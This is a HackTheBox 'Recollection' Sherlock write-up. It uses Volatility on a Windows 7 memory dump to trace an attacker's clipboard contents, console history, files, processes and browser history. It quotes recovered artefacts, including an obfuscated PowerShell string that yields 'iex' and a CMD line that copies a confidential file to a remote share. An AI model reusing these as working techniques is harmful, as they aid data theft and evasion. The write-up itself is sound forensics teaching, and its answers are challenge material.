Recollection

Recollection HackTheBox DFIR Sherlocks Writeup by Thamizhiniyan C S

Sherlock Scenario

A junior member of our security team has been performing research and testing on what we believe to be an old and insecure operating system. We believe it may have been compromised & have managed to retrieve a memory dump of the asset. We want to confirm what actions were carried out by the attacker and if any other assets in our environment might be affected. Please answer the questions below.

Hack The Box

Setting up the Environment

First download the given file and extract it. I used the file command on the extracted file to identify its file type, but it didn't give anything interesting.

Next I used Volatility to check whether the given file is a memory dump.

You can install Volatility from the following repository:

GitHub - volatilityfoundation/volatility: An advanced memory forensics frameworkGitHub

Else you can use the REMnux Distro, which has Volatility preinstalled.

REMnux: A Linux Toolkit for Malware Analysts

In my case, I am using the REMnux Distro.

To check whether the given file is a memory dump, you can use the imaginfo plugin from the Volatility framework.

vol.py imageinfo -f recollection.bin

# -f - Memory Dump file

From the output, we can see that the imageinfo command successfully exectued. Thus, the given file is a memory dump.

Note:

Volatility needs to know what type of system your memory dump came from, so it knows which data structures, algorithms, and symbols to use. You can supply the profile name using the--profile argument.

If you do not know what type of system the memory dump is from, use the imageinfo command to get suggested profiles from the Volatility Framework. Mostly the first suggestion from Volatlity will work fine.

Task 1

Question

What is the Operating System of the machine?

Solution

We can use the imageinfo plugin to get the OS details.

vol.py imageinfo -f recollection.bin

# -f - Memory Dump file

Answer: Windows 7

Task 2

Question

When was the memory dump created?

Solution

We can use the imageinfo plugin to get the creation date of the memory dump.

vol.py imageinfo -f recollection.bin

# -f - Memory Dump file

Answer: 2022-12-19 16:07:30

Task 3

Question

After the attacker gained access to the machine, the attacker copied an obfuscated PowerShell command to the clipboard. What was the command?

Solution

To get the contents of the clipboard from the memory dump, we can us the clipboard plugin.

vol.py --profile=Win7SP1x64 -f recollection.bin clipboard

# --profile - Profile name
# -f - Memory Dump file
# clipboard - Extract the contents of the windows clipboard

Answer: (gv '*MDR*').naMe[3,11,2]-joIN''

Task 4

Question

The attacker copied the obfuscated command to use it as an alias for a PowerShell cmdlet. What is the cmdlet name?

Solution

So to know the cmdlet name, we have to find the output of the obfuscated powershell code. Since, the attacker has copied the command, the attacker might have executed it. So I extracted the command history from the memory file using the consoles plugin.

vol.py --profile=Win7SP1x64 -f recollection.bin consoles

# --profile - Profile name
# -f - Memory Dump file
# consoles - Extract command history by scanning for _CONSOLE_INFORMATION

From the output, we can see that the attacker has executed the Powershell Command and the output of the command is 'iex'. I searched google about iex and got the cmdlet name.

Answer: Invoke-Expression

Task 5

Question

A CMD command was executed to attempt to exfiltrate a file. What is the full command line?

Solution

Again we can check the command history for the exfiltration attempt using the consoles plugin.

vol.py --profile=Win7SP1x64 -f recollection.bin consoles

# --profile - Profile name
# -f - Memory Dump file
# consoles - Extract command history by scanning for _CONSOLE_INFORMATION

Answer:

type C:\Users\Public\Secret\Confidential.txt > \192.168.0.171\pulice\pass.txt

Task 6

Question

Following the above command, now tell us if the file was exfiltrated successfully?

Solution

Again we can get the output of the command that we found in the last task from the command history using the consoles plugin.

vol.py --profile=Win7SP1x64 -f recollection.bin consoles

# --profile - Profile name
# -f - Memory Dump file
# consoles - Extract command history by scanning for _CONSOLE_INFORMATION

From the output we can see that the command was not executed successfully.

Answer: No

Task 7

Question

The attacker tried to create a readme file. What was the full path of the file?

Solution

You can find a Powershell command from the command history that we got using the consoles plugin, which contains a encoded string which looks like base64 encoded.

vol.py --profile=Win7SP1x64 -f recollection.bin consoles

# --profile - Profile name
# -f - Memory Dump file
# consoles - Extract command history by scanning for _CONSOLE_INFORMATION

I used CyberChef to decode the base64 string.

From the output of CyberChef, we can see that the attacker has created a readme file at C:\Users\Public\Office\readme.txt, with the message "hacked by mafia". From this we infer that the attacker name is mafia.

Answer: C:\Users\Public\Office\readme.txt

Task 8

Question

What was the Host Name of the machine?

Solution

You can see that the attacker has executed the net users command to display user account information from the command history that we got using the consoles plugin, which contains the Host Name of the machine.

vol.py --profile=Win7SP1x64 -f recollection.bin consoles

# --profile - Profile name
# -f - Memory Dump file
# consoles - Extract command history by scanning for _CONSOLE_INFORMATION

Answer: USER-PC

Task 9

Question

How many user accounts were in the machine?

Solution

vol.py --profile=Win7SP1x64 -f recollection.bin consoles

# --profile - Profile name
# -f - Memory Dump file
# consoles - Extract command history by scanning for _CONSOLE_INFORMATION

Task 10

Question

In the "\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge" folder there were some sub-folders where there was a file named passwords.txt. What was the full file location/path?

Solution

Volatility can extract all the file objects that are stored in the memory using the filescan plugin. Since, the file name that we are looking out for is given in the question, I used grep to filter the results.

vol.py --profile=Win7SP1x64 -f recollection.bin filescan | grep passwords.txt

# --profile - Profile name
# -f - Memory Dump file
# filescan - Pool scanner for file objects

Answer:

\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt

Task 11

Question

A malicious executable file was executed using command. The executable EXE file's name was the hash value of itself. What was the hash value?

Solution

You can find the output of the malicious executable file from the command history that we got using the consoles plugin, from which you can get the filename, which is also a hash.

vol.py --profile=Win7SP1x64 -f recollection.bin consoles

# --profile - Profile name
# -f - Memory Dump file
# consoles - Extract command history by scanning for _CONSOLE_INFORMATION

Answer: b0ad704122d9cffddd57ec92991a1e99fc1ac02d5b4d8fd31720978c02635cb1

Task 12

Question

Following the previous question, what is the Imphash of the malicious file you found above?

Solution

I used the hash that we got in the last task in the VirusTotal's search feature, to get more details about that file.

VirusTotalVirusTotal

From the results of VirusTotal, we can see that the file is a stealer. We can get the Imphash from the Details tab.

Answer: d3b592cd9481e4f053b5362e22d61595

Task 13

Question

Following the previous question, tell us the date in UTC format when the malicious file was created?

Solution

We can get the date from the VirusTotal Details section that we saw in the last task.

Answer: 2022-06-22 11:49:04

Task 14

Question

What was the local IP address of the machine?

Solution

You can use the netscan plugin of the Volatility framework to extract all the active connections and sockets.

vol.py --profile=Win7SP1x64 -f recollection.bin netscan

# --profile - Profile name
# -f - Memory Dump file
# netscan - Scan a Vista (or later) image for connections and sockets

From the ouput, we can see that the there is owner named system, which is the local IP address.

Answer: 192.168.0.104

Task 15

Question

There were multiple PowerShell processes, where one process was a child process. Which process was its parent process?

Solution

Use the pstree plugin to view the running processes in a tree view.

vol.py --profile=Win7SP1x64 -f recollection.bin pstree

# --profile - Profile name
# -f - Memory Dump file
# pstree - Print process list as a tree

From the output, we can see that there are two Powershell instances of which, one has be spawned from the cmd.exe process, since the powershell.exe process with a Pid 3532 has the PPid as 4052, which is the Pid of the process cmd.exe.

Answer: cmd.exe

Task 16

Question

Attacker might have used an email address to login a social media. Can you tell us the email address?

Solution

First I extracted all the strings from the given memory dump using the strings command and put it in a file named Strings.txt.

strings -el recollection.txt > Strings.txt

# -el - Characters of size 16-bit

With the help of python and regex, I extracted all the emails from the Strings.txt file.

#! /usr/bin/python3

import re

file = "".join(open('Strings.txt', 'r').readlines())

emails = re.findall(r'\b[a-z0-9_-]+@[a-zA-Z0-9]+\.[a-z]{1,3}\b', file)

for each in emails:
    print(each)

You can the output of the above script below.

From all the emails that were extracted, mafia_code1337@gmail.com is the email of interest, since we know that the attackers name is mafia.

Answer: mafia_code1337@gmail.com

Task 17

Question

Using MS Edge browser, the victim searched about a SIEM solution. What is the SIEM solution's name?

Solution

First I checked whether MS Edge is running using the the pstree plugin to. Its running.

vol.py --profile=Win7SP1x64 -f recollection.bin pstree

# --profile - Profile name
# -f - Memory Dump file
# pstree - Print process list as a tree

Since, its mentioned that the victim searched about a SIEM solution using MS Edge browser, I searched about where MS Edge browser stores its search histories and found this article: https://answers.microsoft.com/en-us/microsoftedge/forum/all/where-is-the-file-for-edge-history-stored/a6102594-d7ee-420d-afaa-77f2fc82b3ce, from which I came to know that Edge stores the history in the following path: C:\Users{user}\AppData\Local\Microsoft\Edge\User Data\Default\History.

The browser is still running, so we can extract the cached History file from the memory. For that we need the Address of this file in the memory. To get the memory address, I used the filescan plugin, with a filter using the grep command looking out for the path \AppData\Local\Microsoft\Edge\User Data\Default\History.

vol.py --profile=Win7SP1x64 -f recollection.bin filescan | grep -F "\AppData\Local\Microsoft\Edge\User Data\Default\History"

# --profile - Profile name
# -f - Memory Dump file
# filescan - Pool scanner for file objects
# -F - Treat the search string as a fixed string, not a regular expression

From the output of the previous command, we got the memory address. Now we can use the dumpfiles plugin to extract cached files from memory.

vol.py --profile=Win7SP1x64 -f recollection.bin dumpfiles --dump-dir=./MSEdge -Q 0x000000011e0d16f0

# --profile - Profile name
# -f - Memory Dump file
# dumpfiles - Extract memory mapped and cached files
# --dump-dir - Output location
# -Q - Dump File Object at physical address PHYSOFFSET

After extracting the files, I checked the file type of file.None.0xfffffa80056d1440.dat file using the file command.

From the output of the above command, we can see that the file is a SQLite database. So I used the following online SQLite Viewer to view the contents of the database.

SQLite Viewer

From the output of the above SQLite Viewer, we can see the search terms table, which has the searches done in that browser. From the terms, we can see that the attacker has searched for the SIEM tool Wazuh.

The Open Source Security Platform | WazuhWazuh

Answer: Wazuh

Task 18

Question

The victim user downloaded an exe file. The file's name was mimicking a legitimate binary from Microsoft with a typo (i.e. legitimate binary is powershell.exe and attacker named a malware as powershall.exe). Tell us the file name with the file extension?

Solution

If we take a look at the command history from the memory file which we can extract using the consoles plugin, the victim has listed the Downloads directory which contains a file csrsss.exe.

There is windows system file named csrss.exe ( to know more about this file https://www.file.net/process/csrss.exe.html ), which the attacker used to name the malware.

vol.py --profile=Win7SP1x64 -f recollection.bin consoles

# --profile - Profile name
# -f - Memory Dump file
# consoles - Extract command history by scanning for _CONSOLE_INFORMATION

Answer: csrsss.exe

Bonus Section

Out of curiosity, I also tried dumping the csrsss.exe file that the victim downloaded to know more about it.

First I enumerated the memory address of the csrsss.exe file using the filescan plugin with a grep filter.

vol.py --profile=Win7SP1x64 -f recollection.bin filescan | grep csrsss.exe

# --profile - Profile name
# -f - Memory Dump file
# filescan - Pool scanner for file objects

From the output, we can see that we have two addresses for the same file, both are same, so I dumped the first one using the dumpfile plugin.

vol.py --profile=Win7SP1x64 -f recollection.bin dumpfiles --dump-dir=./csrss/ -Q 0x000000011e955820

# --profile - Profile name
# -f - Memory Dump file
# dumpfiles - Extract memory mapped and cached files
# --dump-dir - Output location
# -Q - Dump File Object at physical address PHYSOFFSET